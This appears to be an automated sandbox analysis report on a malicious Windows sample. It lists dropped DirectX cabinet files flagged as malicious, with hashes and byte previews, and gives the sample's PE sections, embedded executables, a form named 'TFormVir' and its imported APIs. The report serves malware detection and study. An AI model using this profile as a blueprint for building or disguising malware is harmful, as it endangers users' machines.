                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Windows\msdownld.tmp\AS6D3EDB.tmp\Mar2009_d3dx9_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Windows\msdownld.tmp\AS6D498A.tmp\Mar2009_d3dx10_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Windows\msdownld.tmp\AS6D5244.tmp\Aug2009_d3dx9_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Windows\msdownld.tmp\AS6D59F5.tmp\Aug2009_d3dx10_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Windows\msdownld.tmp\AS6D5FE0.tmp\Aug2009_d3dx11_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                              • InstallShield setup (43055/19) 0.40%
                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                              File name:file.exe
                                                                                              File size:1'059'840 bytes
                                                                                              MD5:eaba5b2c3b6607177112ec5f26438ba3
                                                                                              SHA1:d0572bad54faca6af612763c6835feb160a3dcd2
                                                                                              SHA256:43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
                                                                                              SHA512:b767a6f167a0153628ae0bdb468eef4d4311e48a58ff4774843ee36321c48823a24be5c9d0d399800a19733a46ead5109cd54e728e6a260107212647a5f60d9c
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              TLSH:23359E22F2D18437D1721B3C9CAB93A5583ABE512E387A4E7BF91D4C4E3968178253D3
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:878fd7f3b9353593

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x49ab80
                                                                                              Entrypoint Section:CODE
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0049A778h
                                                                                              call 00007FC14472749Dh
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FC14477ADE5h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, 0049ABE0h
                                                                                              call 00007FC14477A9E4h
                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00496590h]
                                                                                              call 00007FC14477ADD4h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FC14477AE48h
                                                                                              call 00007FC144724F7Bh
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x58288.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xb00000x582880x58400c857884e8c6f99827f033b83788aea21False0.7942938872167139data7.438111819013504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                              RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                              RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                              RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                              RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                              RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                              RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                              RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                              RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                              RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                              RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                              RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                              RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                              RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                              RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                              RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                              RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                              RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                              RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.07223264540337711
                                                                                              RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                              RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                              RT_STRING0xb4af40x358data0.3796728971962617
                                                                                              RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                              RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                              RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                              RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                              RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                              RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                              RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                              RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                              RT_STRING0xb67b80xdcdata0.6
                                                                                              RT_STRING0xb68940x320data0.45125
                                                                                              RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                              RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                              RT_STRING0xb6da40x268data0.4707792207792208
                                                                                              RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                              RT_STRING0xb74040x378data0.41103603603603606
                                                                                              RT_STRING0xb777c0x380data0.35379464285714285
                                                                                              RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                              RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                              RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                              RT_STRING0xb800c0x368data0.40940366972477066
                                                                                              RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                              RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                              RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                              RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                              RT_RCDATA0xb8e040x10data1.5
                                                                                              RT_RCDATA0xb8e140x46558PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive0.8737573241509539
                                                                                              RT_RCDATA0xff36c0x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                              RT_RCDATA0xff3700x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                              RT_RCDATA0x102f700x64cdata0.5998759305210918
                                                                                              RT_RCDATA0x1035bc0x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                              RT_RCDATA0x1037100x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                              RT_GROUP_CURSOR0x107ee40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                              RT_GROUP_CURSOR0x107ef80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                              RT_GROUP_CURSOR0x107f0c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f480x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f5c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_ICON0x107f700x14dataTurkishTurkey1.1
                                                                                              RT_VERSION0x107f840x304dataTurkishTurkey0.42875647668393785

                                                                                              Imports

                                                                                              DLLImport
                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                              advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                              kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
